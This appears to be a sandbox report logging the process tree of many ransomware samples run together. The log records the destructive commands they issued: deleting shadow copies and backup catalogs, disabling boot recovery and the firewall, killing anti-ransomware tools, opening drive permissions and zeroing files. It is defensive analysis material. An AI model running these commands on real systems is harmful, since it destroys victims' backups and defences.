PID 4244 wrote to memory of 1464	4244	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe	110
PID 4244 wrote to memory of 1464	4244	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe	110
PID 4580 wrote to memory of 4280	4580	cmd.exe	113
PID 4580 wrote to memory of 4280	4580	cmd.exe	113
PID 4580 wrote to memory of 1152	4580	cmd.exe	115
PID 4580 wrote to memory of 1152	4580	cmd.exe	115
PID 3524 wrote to memory of 4236	3524	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe	116
PID 3524 wrote to memory of 4236	3524	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe	116
PID 3524 wrote to memory of 4236	3524	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe	116
PID 4580 wrote to memory of 1444	4580	cmd.exe	117
PID 4580 wrote to memory of 1444	4580	cmd.exe	117
PID 4580 wrote to memory of 1444	4580	cmd.exe	117
PID 4580 wrote to memory of 2600	4580	cmd.exe	118
PID 4580 wrote to memory of 2600	4580	cmd.exe	118
PID 4580 wrote to memory of 2600	4580	cmd.exe	118
PID 4580 wrote to memory of 4936	4580	cmd.exe	119
PID 4580 wrote to memory of 4936	4580	cmd.exe	119
PID 4580 wrote to memory of 4936	4580	cmd.exe	119
PID 4580 wrote to memory of 1432	4580	cmd.exe	120
PID 4580 wrote to memory of 1432	4580	cmd.exe	120
PID 4580 wrote to memory of 1432	4580	cmd.exe	120
PID 4580 wrote to memory of 2644	4580	cmd.exe	122
PID 4580 wrote to memory of 2644	4580	cmd.exe	122
PID 4580 wrote to memory of 2644	4580	cmd.exe	122
PID 4580 wrote to memory of 3228	4580	cmd.exe	123
PID 4580 wrote to memory of 3228	4580	cmd.exe	123
PID 4580 wrote to memory of 3228	4580	cmd.exe	123
PID 2480 wrote to memory of 1572	2480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe	125
PID 2480 wrote to memory of 1572	2480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe	125
PID 2480 wrote to memory of 1572	2480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe	125
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 2644 wrote to memory of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131
PID 4580 wrote to memory of 5928	4580	cmd.exe	134

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00464.7z
1⤵
- Modifies registry class
PID:3160

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2040

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3484

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00464.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4580
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.MSIL.Agent.gen-aa438f22db488466ed39153b302b4f7557ca4bcc44ba35f83ad2dc8a04903398.exe
    HEUR-Trojan-Ransom.MSIL.Agent.gen-aa438f22db488466ed39153b302b4f7557ca4bcc44ba35f83ad2dc8a04903398.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
  - - C:\Users\Admin\AppData\Roaming\Privacy By Design - Training Module.exe
      "C:\Users\Admin\AppData\Roaming\Privacy By Design - Training Module.exe"
      4⤵
      PID:3688
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
        5⤵
        
        PID:1476
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:8016
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:1932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        5⤵
        
        PID:3336
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1040
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:6688
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
        5⤵
        
        PID:2548
      - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        6⤵
        Deletes backup catalog
        
        PID:5516
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1572
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
      4⤵
      PID:7592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
      4⤵
      PID:5316
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86957c2e724e7b84d44e4178332d1def2566555a2a5da52d626aab14390501d8.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-86957c2e724e7b84d44e4178332d1def2566555a2a5da52d626aab14390501d8.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.MSIL.Encoder.gen-ad5630847e8a067731faf537bbadd32a0acaa25671eec69e65027545ded0b43b.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-ad5630847e8a067731faf537bbadd32a0acaa25671eec69e65027545ded0b43b.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qei4qpcc\qei4qpcc.cmdline"
      4⤵
      PID:5952
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE356.tmp" "c:\Users\Admin\AppData\Local\Temp\qei4qpcc\CSC3C92619DCDEF4765822C34C2B095FCC.TMP"
        5⤵
        
        PID:2544
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe
      4⤵
      Kills process with taskkill
      PID:4872
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe
      4⤵
      Kills process with taskkill
      PID:5968
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F
      4⤵
      PID:4792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
      4⤵
      PID:3244
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
      4⤵
      Launches sc.exe
      PID:4960
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      4⤵
      Launches sc.exe
      PID:8064
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
      4⤵
      Launches sc.exe
      PID:8304
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
      4⤵
      Launches sc.exe
      PID:9016
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config MBAMService start= disabled
      4⤵
      Launches sc.exe
      PID:6336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4584
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
      4⤵
      PID:7704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
      4⤵
      PID:5404
  - - C:\Windows\SYSTEM32\mountvol.exe
      "mountvol.exe"
      4⤵
      PID:8468
  - - C:\Windows\System32\mountvol.exe
      "C:\Windows\System32\mountvol.exe" A: \\?\Volume{1541411d-0000-0000-0000-100000000000}\
      4⤵
      PID:8400
  - - C:\Windows\System32\mountvol.exe
      "C:\Windows\System32\mountvol.exe" B: \\?\Volume{1541411d-0000-0000-0000-d01200000000}\
      4⤵
      PID:7296
  - - C:\Windows\System32\mountvol.exe
      "C:\Windows\System32\mountvol.exe" E: \\?\Volume{1541411d-0000-0000-0000-f0ff3a000000}\
      4⤵
      PID:7352
  - - C:\Windows\System32\mountvol.exe
      "C:\Windows\System32\mountvol.exe" G: \\?\Volume{947f9897-84cf-11ef-bedd-806e6f6e6963}\
      4⤵
      PID:8004
  - - C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:6552
  - - C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:7208
  - - C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:6304
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HowToRestoreMyFiles.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c shutdown /s /t 5
      4⤵
      PID:8412
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /s /t 5
        5⤵
        
        PID:6684
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:852
    - - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.7 -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6724
    - - C:\Windows\system32\fsutil.exe
        
        fsutil file setZeroData offset=0 length=524288 “%s”
        5⤵
        
        PID:4300
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.MSIL.Encoder.gen-ad5630847e8a067731faf537bbadd32a0acaa25671eec69e65027545ded0b43b.exe
      4⤵
      PID:7384
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:7344
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Agent.gen-d96ea612f5aa6881f1dba09133359a0877704eb90f9ae09c9aab1d4eaaa91b99.exe
    HEUR-Trojan-Ransom.Win32.Agent.gen-d96ea612f5aa6881f1dba09133359a0877704eb90f9ae09c9aab1d4eaaa91b99.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3380
  - - C:\Users\Admin\Desktop\00464\encrypter.exe
      "C:\Users\Admin\Desktop\00464\encrypter.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4468
  - - C:\Users\Admin\Desktop\00464\decrypter.exe
      "C:\Users\Admin\Desktop\00464\decrypter.exe"
      4⤵
      PID:6480
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
      "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1464
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
    HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3524
  - - C:\ProgramData\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\33A2E4F0.exe
      "C:\ProgramData\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\33A2E4F0.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4236
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 640
      4⤵
      Program crash
      PID:5204
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4280
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d22fc7bb9213b6d98569496cbc13cd2e9ba938c39b006f1749478d301e4168b6.exe
    HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d22fc7bb9213b6d98569496cbc13cd2e9ba938c39b006f1749478d301e4168b6.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:1152
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Encoder.gen-5864609f7f73c991b178fc8a992d47c10e726ba72bcb2e5acf8d169c23e35629.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-5864609f7f73c991b178fc8a992d47c10e726ba72bcb2e5acf8d169c23e35629.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1444
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2600
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup nomoreransom.bit dns1.soprodns.ru
      4⤵
      PID:6052
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup emsisoft.bit dns1.soprodns.ru
      4⤵
      PID:5172
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup gandcrab.bit dns1.soprodns.ru
      4⤵
      PID:8404
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup nomoreransom.bit dns1.soprodns.ru
      4⤵
      PID:6576
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup emsisoft.bit dns1.soprodns.ru
      4⤵
      PID:7788
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup gandcrab.bit dns1.soprodns.ru
      4⤵
      PID:8256
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
    HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4936
  - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
      "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe"
      4⤵
      Executes dropped EXE
      PID:1132
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:3480
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        5⤵
        Modifies Windows Firewall
        
        PID:5136
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=disable
        5⤵
        Modifies Windows Firewall
        
        PID:5240
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:4160
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4504
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:7828
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7764
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:6892
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:8116
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:6312
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:6932
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "A:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:6152
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:8780
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:3032
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:7444
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:6208
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:1836
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7116
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:8244
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:9084
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:1432
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2560
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\446bda39-c0bc-4f74-9d81-c3aca1e32595" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Modifies file permissions
        
        PID:3704
    - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
        
        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:8476
      - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
        
        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:7960
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:3228
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5928
  - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
      4⤵
      PID:5724
    - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
        
        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:4336
      - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
        
        "C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:6300
- - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
    3⤵
    - Executes dropped EXE
    PID:6072
  - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
      4⤵
      PID:5328
    - - C:\Users\Admin\Desktop\00464\HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe
        
